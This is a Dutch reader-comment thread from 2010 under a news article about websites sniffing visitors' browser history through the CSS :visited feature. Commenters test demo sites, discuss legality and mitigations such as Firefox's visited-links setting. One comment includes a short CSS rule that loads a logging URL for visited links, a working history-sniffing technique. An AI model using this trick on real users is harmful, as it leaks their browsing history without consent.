Gepubliceerd: Woensdag 17 maart 2010
De lijst met voorheen bezochte sites in een browser kan nu geautomatiseerd door websites worden geoogst. Deze hack schendt de wet bescherming persoonsgegevens.
Toon volledig artikel
2 weken te vroeg? wat ik wel zou willen zien is wat bewijs van deze functie. Toon mij maar is een webpagina die deze check echt doet (in sreen shots oid)
Dit is natuurlijk de mooiste vorm van datamining, google doet dit al tijden door je een extra geschiedenis functie aan te bieden, voor eigen gewin en met toestemming (in de vorm je moet het activeren)
Sorry, hoor, lezen schijnt een kunst te zijn:
Scholten heeft de hack gedemonstreerd aan Webwereld.
.
Staat duidelijk in de tekst.
Mag iemand niet om een toelichting in de vorm van afbeeldingen vragen en daar bij direct beschuldigd worden van slecht lezen.
De link in het artikel toont het ook aan. Welliswaar probeert het of je microsoft.com bezocht hebt, en kan alleen maar zien of dat zo is. Het haalt dus niet je browsergeschiedenis op maar gokt en controleert. De exacte url blijft onzichtbaar (tenzij je goed gokt)
Als je eenmaal een pagina goed gegokt hebt, kan je kijken welke links er op die pagina staan, en van links deze op dezelfde wijze achterhalen of ze ooit gevolgd zijn. Het is niet vreselijk eenvoudig, maar zo is wel het klikpad door sites als wikipedia en/of marktplaats te achterhalen.
Als je eenmaal een interessegebied hebt gevonden, kan je door het proberen van gerelateerde links ook gokken. Als je bijvoorbeeld op bol.com bent geweest, probeer dan ook amazon. Komt iemand op marktplaats, probeer dan ook die-andere-tweedehands-site.
Helemaal mee eens, ik snap jouw minnaars ook niet.
Voor welke platforms met versies en browsers met versies geldt deze kwetsbaarheid?
Alle. Het komt door een feature van de browser. Nl hij laat weten of een link al bezocht is en roept daarvoor een gedeelte uit je stylesheet aan. Dat kun je loggen. m.a.w. je voert de browser links en hij laat weten of jij er bent geweest.
Kun je ook niet uitzetten.
inderdaad, maar bij mij kwam een timeout en de volgende melding:
Congratulations, we did not find anything in this category in your browser history.
Feel free to try our other browser history tests.
Met het uitschakelen van javascript ben je er niet. Dan werkt alleen het specifieke testscript van de testsite niet.
Voor (deel)oplossingen kan je hier terecht.
-2 / 2
Tssk, mijn fans houden er zo te zien niet van als ik een link naar oplossingen geef. Marketeers waarschijnlijk? :D
Met de komst van CSS2/3 kan dit toch iedereen?!?
a:visited[href^="http://www.google.nl"] {
display:none;
background-image: url(http://statistieken/log/google)
}
En anders is dit eenvoudig via javascript uit te lezen. Weinig nieuwswaarde dus.
Het gaat mij ook niet zozeer om de technische insteek, maar meer om het feit dat het grote publiek niet weet dat iedereen dit heel makkelijk kan achterhalen. Waarom doen browsers hier niets aan?
Omdat er niet zo heel veel tegen te doen is... behalve dat hele a:visited verhaal uit de CSS specs slopen.
Het is ook minder erg dan de kop doet vermoeden; het is niet mogelijk om de hele history te oogsten, je kan alleen van een url checken of deze is bezocht of niet. Zoals in het artikel zelf staat dus.
De enige manier om deze "hack" te laten werken is een enorme berg met links op je pagina te zetten. En dan niet alleen de domeinnaam, maar ook alle subpagina's.
Dus je kan alleen de links uitlezen die je zelf op de pagina hebt neergezet en je krijgt echt niet een lijstje met laatste bezochte urls binnen.
Zie onder andere het door mij aangehaalde bugzilla ticket; browsers zijn hier wel mee bezig, maar misschien niet (duidelijk) genoeg. Firefox heeft iig een layout.css.visited_links_enabled setting, en de meeste browsers hebben ook een 'privacy' mode waar deze hack volgens mij ook niet werkt (of in ieder geval niet hoort te werken).
Ik denk dat uiteindelijk de gebruiker de keuze zelf zou moeten maken tussen gebruiksvriendelijkheid en veiligheid door middel van (makkelijk bereikbare - daar schort de setting van Firefox al te kort) opties. Je zou in ieder geval een optie kunnen bieden om dit gedrag helemaal uit te schakelen, een optie om alleen visited links binnen het huidige domein te markeren, en/of een whitelist van domeinen die je genoeg vertrouwd om wel alle visited links te markeren. Vooral voor het overzicht van zoekresultaten van een searchengine is dit toch een hele waardevolle feature.
Wat een misleidende kop. Uit het bericht concludeer ik dat je blijkbaar alleen kunt zien of iemand wel of niet een link bezocht heeft. Op zich ook een kwalijke zaak, maar een stuk minder ernstig dan de kop doet vermoeden.
De enige manier om zo een volledige lijst van de browsergeschiedenis te verkrijgen is als je eerst al een volledige lijst van ALLE urls van het hele web genereert. Ik hoef vast niet uit te leggen dat dat in de praktijk een tijdrovende klus gaat worden.
Als deze functionaliteit gekoppeld is aan een flinke database van url's (zoals Alexa of zo) dan kom je al gauw aan een behoorlijk volledige browsegeschiedenis van een bezoeker. Zie bijv www.whattheinternetknowsaboutyou.com, zoals bovenin deze thread werd geopperd.
Voor IT-ers is deze kennis misschien niet nieuw, maar voor (Online) marketeers misschien wel. Zij kunnen bijvoorbeeld deze informatie inzetten om te kijken welke pagina's voor hun het lukratiefst zijn om op te adverteren. De discussie die echter gesteld moet worden is of deze gegevens verzameling wel toegestaan moet zijn....
Volgens ict-jurist Arnoud Engelfriet is deze hack zonder twijfel illegaal. "Je mag gegevens gebruiken die een klant aanlevert, maar daarvoor moet die expliciet of impliciet toestemming hebben gegeven." Dat geldt bijvoorbeeld voor de user agent of cookies. "Maar dit is absoluut niet te vergelijken met browserversie tracken of cookies zetten."
Discussie is toch niet nodig? Het antwoord wordt toch echt al gegeven in het artikel.
Heb je het artikel van Andreas wel helemaal gelezen?
Dit lijkt me vooral aan de browserzijde een fiks gat van jewelste.
Niet nieuw maar daarom niet minder erg.
Welke browsers er allemaal gevoelig voor zijn?
IE: Congratulations, we did not find anything in this category in your browser history.Feel free to try our other browser history tests.
FF: volledige geschiedenis getoond.
moet de rest nog testen beide onder W7,64bit
Is niet best dit.. een browser moet je privacy beschermen.
ik gebruik inderdaad FF maar wel degelijk soms IE dus het is hier IE die het tegen weet te houden en firefox die wagenwijd alles bloot geeft. mm, wat ongelukkig geformuleerd ;)
Ik heb het even snel getest (de desktop stond toch aan)
Eerst heb ik bezocht:
www.garfield.com/
www.leasticoulddo.com/ (De comic van 17-3 zal je wel aanspreken)
En daarna:
www.whattheinte...wsaboutyou.com/
En beide werden 'netjes' getoond in IE8. ;)
klopt hier ook.. blijkbaar weinig sites bezocht uit de lijst.
De flauwe grapjes site geeft ook een ander thumb dan het origineel./ dat is dus vooral cosmetisch van aard.
Dus nog een browser die hoognodig zijn privacysettings moet aanpassen. Dat maakt het er niet bete rop!
Het achterhalen van alle sites waar de gebruiker geweest is, is redelijk bewerkelijk, dus ik verwacht persoonlijk niet dat dit op korte termijn tot grote problemen gaat leiden.
Ik heb verder wel voor alle zekerheid de truc voor Firefox doorgevoerd. Als meer mensen dat doen, dan loopt dit denk ik wel met een sisser af.
Voor Firefox is er een heel eenvoudige oplossing:
Firefox 3.5 users will be happy to learn that their browser has a configuration option which disables visited links. To enable it, type in about:config in the address bar and set the layout.css.visited_links_enabled option to False.
Wel apart dat het bij jouw in IE niet werkte. Waarschijnlijk is je historie leeg omdat je een Firefox gebruiker bent.
Thanks weer leuk ontdekt die oplossing voor ff
Maar bedoelde je niet:
Firefox 3.5 users will be happy to learn that their browser has a configuration option which disables visited links. To DISABLE it, type in about:config in the address bar and set the layout.css.visited_links_enabled option to False.
Volgens mij enable je de configuratie optie 'which disables visited links'. Maar misschien had de site het anders (helderder) kunnen formuleren.
Het verbaasd mij ten zeerste dat bij Mozilla veiligheid de boven toon voert, maar dat men deze optie niet default aanzet?
Ik denk dat daar 2 redenen voor zijn. Het achterhalen van je browsergeschiedenis is meer gokwerk, dus misbruik is nog niet zo gemakkelijk als dat het lijkt. En de klachten dat mensen niet meer kunnen zien welke links ze op de pagina al gezien hebben zouden waarschijnlijk te groot zijn.
Wat ze wat mij betreft wel zouden kunnen doen, is hier iets prominenter aandacht aan besteden.
Het is weliswaar gokken, maar je kan ook intelligent gokken en bijvoorbeeld beginnen met de 20 populairste pornosites.
Het achterhalen van je browsergeschiedenis is meer gokwerk, dus misbruik is nog niet zo gemakkelijk als dat het lijkt. En de klachten dat mensen niet meer kunnen zien welke links ze op de pagina al gezien hebben zouden waarschijnlijk te groot zijn.
Leest mw. peter deze site ook?
Dat vergeten mensen altijd als t gaat om veiligheid. Vreest uw vrienden!
(geldt ook zo voor de chipkaart)
Moet je natuurlijk even verder door lezen Peter
However, note that this workardound does not protect you from having your history detected using the pure CSS method; therefore, it can only make history detection slightly slower and doesn't really solve the problem.
Er is op dit moment dus absoluut geen browser veilig voor dit 'history detection' probleem
Dat slaat op een andere truc. :)
Also, as a partial solution, in some browsers (including, the most popular ones: Firefox and Internet Explorer), you can override the default way to show visited links. In principle, this should protect you from having your history detected with Javascript;
De setting in Firefox schakelt de css:visited tag helemaal uit. Dus hoe je het dan via pure css nog wil achterhalen vraag ik me af.
Ik gooi mijn browsergeschiedenis meerdere malen per dag weg. Om die reden geef ik de voorkeur aan Firefox boven Chrome. Bij Chrome zit de knop om alles weg te gooien te ver weg, dat private browsing maakt je maar verdacht bij je naasten.
Hmmmm gezien er in het algemeen JS nodig is zit ik met FF + noscript dus safe
javascript laat ik bijna nooit toe
Mmmm...
'Scholten wil hiermee vooral waarschuwen voor het fenomeen en geeft de code dan ook niet vrij, vertelt hij. "Bijna niemand kent deze truc. De meeste internetgebruikers weten hier niks van.'
Bedankt Scholten! Nu kent iedereen de truc en iedereen kan 'm ook nog eens gebruiken door je javascripje te knippen en te plakken. Lekker slim, lekker veilig.
Deze hack schendt de wet bescherming persoonsgegevens.
Sinds wanneer is enige handeling die op een computer plaatsvind zonder expliciete toestemming van de rechtmatige eigenaar, die ook niet ten bate van de eigenaar kan zijn, rechtmatig ?
De term hack in meest gebruikte context als ook in deze context slaat erop dat iemand een iets exploiteert en daarmee al een onrechtmatige handeling doet zoals in wet computercriminaliteit II is gedefinieerd. Dat is strafrecht dus iemand kan de cel in......
Echter voor schending van privacy gaat niemand de cel in.
Om te kunnen reageren, dient u ingelogd te zijn.
2 jaar geleden: 13 februari 2010
3 jaar geleden: 13 februari 2009
4 jaar geleden: 13 februari 2008
5 jaar geleden: 13 februari 2007
14 jaar geleden: 13 februari 1998
IDG Nederland is uitgever van: AppFish
, CIO, Computer!Totaal, Computerworld, ITworld, Jobworld, MacWorld, RAW fotomagazine, TechFish, Tips & Trucs, Webwereld en Zoom.nlMeer informatie: IDG Nederland, IDG.com, Privacy-statement, Cookie-statement Hosting by Terremark.
